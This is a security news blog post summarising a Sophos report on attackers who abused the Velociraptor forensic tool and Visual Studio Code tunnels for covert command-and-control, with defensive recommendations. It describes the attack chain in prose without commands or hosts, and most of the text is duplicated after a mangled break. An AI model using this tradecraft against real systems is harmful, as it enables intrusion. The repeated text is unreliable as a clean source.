Abstract illustration of a Trojan horse on a computer screen with a security shield, representing abuse of forensic tools for covert attacks.

Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling

by

RedSecNinja
in ,

Overview

Cybersecurity researchers warned that unknown threat actors have abused the open source digital forensics tool Velociraptor to establish a covert command‑and‑control (C2) tunnel using Visual Studio Code. The attack, detailed by Sophos and reported by The Hacker News, shows how incident‑response programs can be repurposed to minimize the use of custom malware while still achieving persistence and data theft. This living‑off‑the‑land technique reflects an evolving trend in which adversaries weaponize legitimate software to avoid detection.

Attack chain

According to Sophos’s analysis, the threat actor used the msiexec utility to download an MSI installer from a Cloudflare Workers domain. The installer deployed Velociraptor on the victim’s machine and configured it to communicate with a second Cloudflare domain. Once Velociraptor was running, the attackers executed an encoded PowerShell command to fetch Visual Studio Code (code.exe) from the same staging server and launched it with the tunnel option, effectively creating a remote C2 channel. The tunnel allowed remote access and code execution and triggered a Taegis alert that eventually led to the attack’s discovery.

Sophos noted that the attackers re‑used msiexec to download additional payloads from the Cloudflare environment, demonstrating how common Windows utilities can be abused repeatedly. The campaign also leveraged Microsoft Teams as an initial access vector: attackers impersonated IT support staff via direct messages to lure users into installing remote‑access tools like AnyDesk, DWAgent or Quick Assist, then used those footholds to deploy malware. This combination of social‑engineering and living‑off‑the‑land tactics underscores the sophistication of the operation.

Impact and recommended actions

While the use of Velociraptor for C2 tunneling is unusual, the technique fits a broader pattern of adversaries abusing legitimate tools. By hiding behind trusted software, attackers reduce the need for bespoke malware and evade many endpoint detections. Sophos warned that organisations should treat any unauthorized deployment of Velociraptor as a pre‑ransomware indicator.

Recommended actions:

  1. Monitor for unexpected tools and behaviour: Implement endpoint detection and response (EDR) systems and alert on unusual installations of incident‑response tools like Velociraptor.
  2. Harden remote communication channels: Restrict the use of tunneling options in development environments (e.g., Visual Studio Code) and monitor for their misuse.
  3. Secure collaboration platforms: Train users to be cautious of unsolicited Microsoft Teams or Slack messages and verify IT support requests. Disable the ability to install remote‑access tools without administrative approval.
  4. Maintain offline backups: Ensure regular, tested backups to limit the impact if attackers pivot to ransomware deployment, which often follows such initial intrusions.

Conclusion

The Velociraptor/Visual Studio Code attack highlights the challenge defenders face when legitimate tools are turned against them. By combining social‑engineering, Windows utilities and open‑source software, attackers were able to establish a covert C2 tunnel without deploying obvious malware. Security teams must expand their monitoring to include unexpected uses of trusted tools, enforce stricter controls on remote‑access utilities, and foster a security culture that questions unusual IT support interactions.

Sources: The Hacker News – Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling, Sophos Counter Threat Unit – Veociraptor incident response tool abused for remote accessverview

Attack chain

According to Sophos’s analysis, the threat actor used the msiexec utility to download an MSI installer from a Cloudflare Workers domain. The installer deployed Velociraptor on the victim’s machine and configured it to communicate with a second Cloudflare domain. Once Velociraptor was running, the attackers executed an encoded PowerShell command to fetch Visual Studio Code (code.exe) from the same staging server and launched it with the tunnel option, effectively creating a remote C2 channel. The tunnel allowed remote access and code execution and triggered a Taegis alert that eventually led to the attack’s discovery.

Sophos noted that the attackers re‑used msiexec to download additional payloads from the Cloudflare environment, demonstrating how common Windows utilities can be abused repeatedly. The campaign also leveraged Microsoft Teams as an initial access vector: attackers impersonated IT support staff via direct messages to lure users into installing remote‑access tools like AnyDesk, DWAgent or Quick Assist, then used those footholds to deploy malware. This combination of social‑engineering and living‑off‑the‑land tactics underscores the sophistication of the operation.

Impact and recommended actions

While the use of Velociraptor for C2 tunneling is unusual, the technique fits a broader pattern of adversaries abusing legitimate tools. By hiding behind trusted software, attackers reduce the need for bespoke malware and evade many endpoint detections. Sophos warned that organisations should treat any unauthorized deployment of Velociraptor as a pre‑ransomware indicator.

Recommended actions:

  1. Monitor for unexpected tools and behaviour: Implement endpoint detection and response (EDR) systems and alert on unusual installations of incident‑response tools like Velociraptor.
  2. Harden remote communication channels: Restrict the use of tunneling options in development environments (e.g., Visual Studio Code) and monitor for their misuse.
  3. Secure collaboration platforms: Train users to be cautious of unsolicited Microsoft Teams or Slack messages and verify IT support requests. Disable the ability to install remote‑access tools without administrative approval.
  4. Maintain offline backups: Ensure regular, tested backups to limit the impact if attackers pivot to ransomware deployment, which often follows such initial intrusions.

Conclusion

The Velociraptor/Visual Studio Code attack highlights the challenge defenders face when legitimate tools are turned against them. By combining social‑engineering, Windows utilities and open‑source software, attackers were able to establish a covert C2 tunnel without deploying obvious malware. Security teams must expand their monitoring to include unexpected uses of trusted tools, enforce stricter controls on remote‑access utilities, and foster a security culture that questions unusual IT support interactions.

Sources: The Hacker News – Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling, Sophos Counter Threat Unit – Velociraptor incident response tool abused for remote access

Comments

Leave a comment